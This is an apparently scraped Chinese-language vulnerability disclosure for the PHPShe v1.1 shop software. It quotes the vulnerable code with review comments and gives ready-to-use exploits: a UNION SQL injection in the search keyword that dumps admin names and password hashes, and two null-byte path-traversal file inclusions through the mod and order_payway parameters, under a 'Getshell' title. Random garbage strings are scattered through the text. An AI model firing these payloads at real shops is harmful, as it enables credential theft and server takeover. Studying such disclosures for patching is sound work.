
phpshe v1.1多处SQL注入和文件包含漏洞Getshell

发表于 2013-4-19 19:01:54
/*******************************************************/
/* Phpshe v1.1 Vulnerability.
/* ========================
/* By: : Kn1f3
/* E-Mail : 681796@qq.com
/*******************************************************/
0×00 整体大概参数传输

//common.php
// Request bootstrap: every key of $_GET/$_POST (and, below, $_SESSION/$_COOKIE) becomes a
// PHP variable via extract() with a per-source prefix: $_g_<key>, $_p_<key>, $_s_<key>, $_c_<key>.
// pe_trim()/pe_stripslashes() are project helpers not shown in this excerpt; nothing visible
// here applies SQL or path escaping, so the $_g_*/$_p_*/$_c_* variables are raw client input.
if (get_magic_quotes_gpc()) {
    // magic_quotes is on: presumably pe_stripslashes() undoes the automatic backslashes first — confirm against its definition
    !empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
    !empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');
}
else {
    !empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
    !empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');
}
session_start();
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
// Cookies get the same treatment, so $_c_* values (e.g. $_c_cart_list, which index.php unserializes) are client-controlled.
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
1 q+ ~: F% ?& L8 a; @
0×01 包含漏洞

//首页文件
<?php
include('common.php');
$cache_category = cache::get('category');
$cache_category_arr = cache::get('category_arr');
$cache_class = cache::get('class');
$cache_ad = cache::get('ad');
$cache_link = cache::get('link');
$cache_page = cache::get('page');
// $cache_setting, $db and $pe are presumably initialised by common.php — not visible in this excerpt.
$web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array();
// Cart badge: logged-in users are counted from the DB, anonymous users from the cart_list cookie.
// NOTE(review): $_c_cart_list is extracted from $_COOKIE in common.php, so unserialize() here
// runs on client-supplied data — treat as untrusted (json_decode would be the safer encoding).
$cart_num = pe_login('user') ? $db->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
// Front-controller dispatch. $mod is taken straight from $_POST/$_GET in common.php with no
// allow-list, so the include path is client-controlled (the author calls this a "limited" inclusion).
include("{$pe['path_root']}module/{$module}/{$mod}.php");
pe_result();
?>
//common 文件 第15行开始
//url路由配置
// Route selection: defaults first, then POST overrides GET overrides the default.
$module = $mod = $act = 'index';
// No allow-list or character check on $mod/$act; $mod is later interpolated into an include
// path by index.php. A defender would restrict it, e.g. to /^[a-z0-9_]+$/ or to the known module names.
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
// $id gets no default above, so the final fallback reads an undefined $id unless it is set earlier in common.php.
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00* l# \1 ]0 T# h- @+ F


0×02 搜索注入
<code id="code2">

//product.php文件
case 'list':
    // Product listing for a category, with optional keyword / ordering / paging from the query string.
    $category_id = intval($id);  // cast to int, so this one is safe to interpolate below
    $info = $db->pe_select('category', array('category_id'=>$category_id));
    // search filters — built as a raw SQL string and handed to pe_selectall() as $where
    $sqlwhere = " and `product_state` = 1";
    pe_lead('hook/category.hook.php');
    if ($category_id) {
        $sqlwhere .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
    }
    // $_g_keyword (from $_GET) is interpolated into the LIKE clause without any SQL escaping.
    $_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'";
    if ($_g_orderby) {
        // $_g_orderby is likewise client input: both halves land unescaped in the ORDER BY
        // (column name and direction). A defender would map it against a fixed list of columns and asc/desc.
        $orderby = explode('_', $_g_orderby);
        $sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
    }
    else {
        $sqlwhere .= " order by `product_id` desc";
    }
    // 16 rows per page; $_g_page is passed through as the page number (how sql_selectall() treats it is not shown here)
    $info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));
    // best-seller list
    $product_hotlist = product_hotlist();
    // breadcrumb path
    $nowpath = category_path($category_id);
    $seo = pe_seo($info['category_name']);
    include(pe_tpl('product_list.html'));
//跟进selectall函数库
/**
 * Run "select {$field} from `<dbpre><table>` <where>" with optional paging.
 *
 * @param string       $table      table name without the dbpre prefix; interpolated as-is
 * @param array|string $where      array or raw clause string; both go through _dowhere() (not shown),
 *                                 so whether a string $where is escaped is not visible here — product.php
 *                                 passes " and ... " strings built from request input
 * @param string       $field      column list; interpolated as-is, not escaped
 * @param array        $limit_page paging spec handed to sql_selectall() (product.php passes array(16, $_g_page))
 */
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())
{
    // build the condition clause
    $sqlwhere = $this->_dowhere($where);
    return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
}
//exp* ~, Q9 @. d& G7 B* k
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1& C* O' x6 Y' P: `

</code>

0×03 包含漏洞2

<code id="code3">

//order.php

case 'pay':
    // Payment step for an unpaid order: render the payment-method chooser, or on submit hand off to the payway plugin.
    $order_id = pe_dbhold($_g_id);  // pe_dbhold() presumably escapes for the DB — not shown here
    $cache_payway = cache::get('payway');
    foreach($cache_payway as $k => $v) {
        // payway_config is stored serialized in the cache
        $cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);
        if ($k == 'bank') {
            // replaces real line breaks/tabs with the two-character literal \n (single-quoted) — presumably for embedding in the template
            $cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);
        }
    }
    $order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));
    !$order['order_id'] && pe_error('订单号错误...');
    if (isset($_p_pesubmit)) {
        // $_p_info is the whole POSTed info[] array written straight into the order row —
        // the column set is not restricted here (mass assignment); only the fields the form
        // legitimately edits should be copied into the update.
        if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {
            $info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));
            foreach ($info_list as $v) {
                $order['order_name'] .= "{$v['product_name']};";
            }
            echo '正在为您连接支付网站,请稍后...';
            // $_p_info['order_payway'] is client input used directly as a path segment; although
            // $cache_payway was loaded above, nothing checks that the value is one of its keys.
            // A defender would require array_key_exists($_p_info['order_payway'], $cache_payway) before this include.
            include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");
        }// once the order update succeeds, the include above runs with the client-chosen path (the author's "limited" inclusion)
        else {
            pe_error('支付错误...');
        }
    }
    $seo = pe_seo('选择支付方式');
    include(pe_tpl('order_pay.html'));
    break;
}  // closes the enclosing switch; its header is not part of this excerpt

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
